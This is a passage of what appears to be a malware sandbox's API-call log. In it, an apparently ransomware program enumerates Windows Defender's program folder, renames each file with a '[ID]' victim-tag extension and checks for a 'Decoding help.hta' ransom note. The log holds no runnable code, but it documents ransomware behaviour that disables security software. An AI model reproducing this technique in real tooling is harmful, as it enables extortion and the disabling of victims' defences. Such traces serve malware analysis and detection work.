(lpString="MpCmdRun.exe") returned 12 [0039.691] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.691] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.691] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="MpCmdRun.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpCmdRun.exe") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpCmdRun.exe" [0039.691] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\MpCmdRun.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpCmdRun.exe") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpCmdRun.exe" [0039.691] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpCmdRun.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpCmdRun.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpCmdRun.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.691] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpCmdRun.exe" (normalized: "c:\\program files\\windows defender\\mpcmdrun.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpCmdRun.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows defender\\mpcmdrun.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.691] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2070df03, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x2070df03, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x33cb3690, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x4ce00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MpCommu.dll", cAlternateFileName="")) returned 1 [0039.691] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.691] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.691] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" [0039.691] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" (normalized: "c:\\program files\\windows defender\\decoding help.hta")) returned 0x1 [0039.691] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MpCommu.dll") returned -1 [0039.691] lstrlenW (lpString="MpCommu.dll") returned 11 [0039.691] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.691] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.691] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="MpCommu.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpCommu.dll") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpCommu.dll" [0039.691] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\MpCommu.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpCommu.dll") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpCommu.dll" [0039.691] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpCommu.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpCommu.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpCommu.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.691] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpCommu.dll" (normalized: "c:\\program files\\windows defender\\mpcommu.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpCommu.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows defender\\mpcommu.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.691] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15819bcb, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x15819bcb, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x7d1de1f0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0xcc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MpEvMsg.dll", cAlternateFileName="")) returned 1 [0039.691] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.692] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.692] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" [0039.692] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" (normalized: "c:\\program files\\windows defender\\decoding help.hta")) returned 0x1 [0039.692] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MpEvMsg.dll") returned -1 [0039.692] lstrlenW (lpString="MpEvMsg.dll") returned 11 [0039.692] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.692] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.692] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="MpEvMsg.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpEvMsg.dll") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpEvMsg.dll" [0039.692] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\MpEvMsg.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpEvMsg.dll") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpEvMsg.dll" [0039.692] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpEvMsg.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpEvMsg.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpEvMsg.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.692] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpEvMsg.dll" (normalized: "c:\\program files\\windows defender\\mpevmsg.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpEvMsg.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows defender\\mpevmsg.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.692] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18c9dd08, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x18c9dd08, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x33d01890, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xcc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MpOAV.dll", cAlternateFileName="")) returned 1 [0039.692] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.692] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.692] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" [0039.692] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" (normalized: "c:\\program files\\windows defender\\decoding help.hta")) returned 0x1 [0039.692] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MpOAV.dll") returned -1 [0039.692] lstrlenW (lpString="MpOAV.dll") returned 9 [0039.692] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.692] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.692] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="MpOAV.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpOAV.dll") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpOAV.dll" [0039.693] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\MpOAV.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpOAV.dll") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpOAV.dll" [0039.693] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpOAV.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpOAV.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpOAV.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.693] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files\\windows defender\\mpoav.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpOAV.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows defender\\mpoav.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.693] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d4eb396, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x1d4eb396, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x33f88820, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x30e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MpRTP.dll", cAlternateFileName="")) returned 1 [0039.693] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.693] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.693] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" [0039.693] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" (normalized: "c:\\program files\\windows defender\\decoding help.hta")) returned 0x1 [0039.693] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MpRTP.dll") returned -1 [0039.693] lstrlenW (lpString="MpRTP.dll") returned 9 [0039.693] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.693] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.693] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="MpRTP.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpRTP.dll") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpRTP.dll" [0039.693] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\MpRTP.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpRTP.dll") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpRTP.dll" [0039.693] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpRTP.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpRTP.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpRTP.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.693] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpRTP.dll" (normalized: "c:\\program files\\windows defender\\mprtp.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpRTP.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows defender\\mprtp.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.693] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34b85c54, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x34b85c54, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x33f88820, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xf7000, dwReserved0=0x0, dwReserved1=0x0, cFileName="MpSvc.dll", cAlternateFileName="")) returned 1 [0039.693] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.694] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.694] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" [0039.694] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" (normalized: "c:\\program files\\windows defender\\decoding help.hta")) returned 0x1 [0039.694] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MpSvc.dll") returned -1 [0039.694] lstrlenW (lpString="MpSvc.dll") returned 9 [0039.694] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.694] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.694] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="MpSvc.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpSvc.dll") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpSvc.dll" [0039.694] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\MpSvc.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpSvc.dll") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpSvc.dll" [0039.694] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpSvc.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MpSvc.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MpSvc.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.694] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpSvc.dll" (normalized: "c:\\program files\\windows defender\\mpsvc.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpSvc.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows defender\\mpsvc.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.694] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2afc28f9, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x2afc28f9, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xe8c21380, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xeaa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSASCui.exe", cAlternateFileName="")) returned 1 [0039.694] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.694] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.694] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" [0039.694] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" (normalized: "c:\\program files\\windows defender\\decoding help.hta")) returned 0x1 [0039.694] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSASCui.exe") returned -1 [0039.694] lstrlenW (lpString="MSASCui.exe") returned 11 [0039.694] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.694] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.694] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="MSASCui.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MSASCui.exe") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MSASCui.exe" [0039.694] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\MSASCui.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MSASCui.exe") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MSASCui.exe" [0039.694] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MSASCui.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MSASCui.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MSASCui.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.694] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MSASCui.exe" (normalized: "c:\\program files\\windows defender\\msascui.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MSASCui.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows defender\\msascui.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.695] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e1b943a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9e1b943a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9e1b943a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsMpCom.dll", cAlternateFileName="")) returned 1 [0039.695] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.695] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.695] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" [0039.695] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" (normalized: "c:\\program files\\windows defender\\decoding help.hta")) returned 0x1 [0039.695] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MsMpCom.dll") returned -1 [0039.695] lstrlenW (lpString="MsMpCom.dll") returned 11 [0039.695] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.695] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.695] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="MsMpCom.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpCom.dll") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpCom.dll" [0039.695] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpCom.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpCom.dll") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpCom.dll" [0039.695] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpCom.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpCom.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpCom.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.695] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpCom.dll" (normalized: "c:\\program files\\windows defender\\msmpcom.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpCom.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows defender\\msmpcom.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.695] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x144043c0, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x144043c0, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x94b72470, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsMpLics.dll", cAlternateFileName="")) returned 1 [0039.695] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.695] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.695] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" [0039.695] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\Decoding help.hta" (normalized: "c:\\program files\\windows defender\\decoding help.hta")) returned 0x1 [0039.695] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MsMpLics.dll") returned -1 [0039.695] lstrlenW (lpString="MsMpLics.dll") returned 12 [0039.695] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.695] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.696] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="MsMpLics.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpLics.dll") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpLics.dll" [0039.696] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpLics.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpLics.dll") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpLics.dll" [0039.696] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpLics.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpLics.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpLics.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.696] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpLics.dll" (normalized: "c:\\program files\\windows defender\\msmplics.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpLics.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows defender\\msmplics.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.696] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x8e0fd30 | out: lpFindFileData=0x8e0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1594a6b3, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x1594a6b3, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x36199360, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x77200, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsMpRes.dll", cAlternateFileName="")) returned 1 [0039.696] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Defender\\*.*" [0039.696] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Defender\\*.*") returned 41 [0039.696] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Defender\\", lpString2="Decoding help.hta" | out: 